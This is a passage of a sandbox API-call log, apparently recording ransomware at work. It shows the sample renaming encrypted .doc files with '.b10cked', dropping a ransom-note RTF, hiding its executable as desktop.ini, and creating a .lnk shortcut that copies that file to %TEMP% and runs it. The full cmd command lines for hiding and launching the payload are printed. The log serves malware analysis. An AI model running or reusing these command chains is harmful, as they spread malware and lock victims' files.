lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0135.233] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xa6f1, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xa6f1, lpOverlapped=0x0) returned 1 [0135.234] SetFilePointer (in: hFile=0x114, lDistanceToMove=-42737, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa6f3 [0135.234] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xa6f1, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xa6f1, lpOverlapped=0x0) returned 1 [0135.234] SetFilePointer (in: hFile=0x114, lDistanceToMove=-42737, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa6f3 [0135.234] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xa6f1, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, 
lpNumberOfBytesWritten=0x12ec1c*=0xa6f1, lpOverlapped=0x0) returned 1 [0135.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="92pj.doc", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0135.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="92pj.doc", cchWideChar=8, lpMultiByteStr=0x131322c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="92pj.doc", lpUsedDefaultChar=0x0) returned 8 [0135.238] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x14de4 [0135.238] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0135.238] CloseHandle (hObject=0x114) returned 1 [0135.239] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc") returned 0x35 [0135.239] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\") returned 0x2d [0135.240] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, 
dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xa18, dwThreadId=0xa0c)) returned 1 [0135.281] CloseHandle (hObject=0x110) returned 1 [0135.281] CloseHandle (hObject=0x114) returned 1 [0135.281] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\", cchLength=0x2d | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\U7E2T\\") returned 0x2d [0135.281] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0135.281] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\U7E2T\\", cchCount1=45, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount2=27) returned 1 [0135.281] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\", cchLength=0x2d | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\U7E2T\\") returned 0x2d [0135.281] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0135.281] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\U7E2T\\", cchCount1=45, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0135.281] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0135.282] CharUpperBuffW (in: 
lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0135.282] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0135.282] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\") returned 0x2d [0135.282] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0135.282] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0135.282] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0xc7c, dwThreadId=0xc98)) returned 1 [0135.295] CloseHandle (hObject=0x110) returned 1 [0135.295] CloseHandle (hObject=0x114) returned 1 [0135.295] GetFileAttributesW 
(lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\u7e2t\\bl0cked-readme.rtf")) returned 0xffffffff [0135.295] GetLastError () returned 0x2 [0135.295] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\u7e2t\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0135.343] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\u7e2t\\bl0cked-readme.rtf")) returned 0x20 [0135.344] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0135.344] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0135.344] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0135.344] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0135.344] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0135.344] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0135.344] CharUpperBuffW (in: 
lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0135.344] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\", lpszShortPath=0x123027c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\") returned 0x2d [0135.344] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0135.344] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0135.344] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T", lpszShortPath=0x123003c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T") returned 0x2c [0135.345] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x16e | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\U7E2T\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\U7E2T\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\U7E2T\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\U7E2T\\DESKTOP.INI\" && ATTRIB +H 
\"[TO_DIR]\"") returned 0x16e [0135.345] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0135.345] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\"", lpProcessInformation=0x12fb78*(hProcess=0x114, hThread=0x110, dwProcessId=0xcb0, dwThreadId=0xcac)) returned 1 [0135.352] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0xffffffff) returned 0x0 [0137.273] CloseHandle (hObject=0x114) returned 1 [0137.273] CloseHandle (hObject=0x110) returned 1 [0137.273] CompareStringW 
(Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0137.273] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0137.273] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0137.273] GetTickCount () returned 0x2b52b [0137.273] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=19406272539) returned 1 [0137.274] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x63\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0137.274] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x4e\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0137.274] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x42\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0137.274] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x67\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0137.274] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x7a\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0137.274] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x75\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 
1 [0137.274] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x44\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0137.274] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6f\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0137.274] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0137.274] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0137.274] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0137.274] CharUpperBuffW (in: lpsz="explorer.exe \"u7E2T\" & type \"u7E2T\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x5b | out: lpsz="EXPLORER.EXE \"U7E2T\" & TYPE \"U7E2T\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x5b [0137.274] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0137.274] CharUpperBuffW (in: lpsz="explorer.exe \"u7E2T\" & type \"u7E2T\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x5c | out: lpsz="EXPLORER.EXE \"U7E2T\" & TYPE \"U7E2T\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x5c [0137.274] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0137.274] CoInitialize (pvReserved=0x0) returned 0x0 [0137.274] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, 
[3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0137.276] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0137.276] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0137.276] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0137.278] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"u7E2T\" & type \"u7E2T\\desktop.ini\" > \"%TEMP%\\cNBgzuDo.exe\" && \"%TEMP%\\cNBgzuDo.exe\"") returned 0x0 [0137.278] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0137.278] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0137.278] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0137.278] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T.lnk", fRemember=0) returned 0x0 [0137.286] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0137.286] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0137.286] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0137.286] CoUninitialize () [0137.287] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.287] ReleaseMutex (hMutex=0xf8) returned 1 [0137.287] WaitForSingleObject (hHandle=0xf8, 
dwMilliseconds=0xffffffff) returned 0x0 [0137.287] ReleaseMutex (hMutex=0xf8) returned 1 [0137.287] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.287] ReleaseMutex (hMutex=0xf8) returned 1 [0137.287] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.287] ReleaseMutex (hMutex=0xf8) returned 1 [0137.287] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\UzyEGr8akjufgS.doc" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\nrwdonydb2-uaoum\\1vhpwyxy0ynvr kbaeh\\uzyegr8akjufgs.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0137.288] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.288] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x12c70 [0137.288] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.288] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=19407727850) returned 1 [0137.288] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.288] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x12c70 [0137.288] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.288] SetFilePointer (in: hFile=0x114, 
lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.288] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x12c70 [0137.288] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.288] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0137.289] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x12c70 [0137.289] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0137.289] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.289] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: 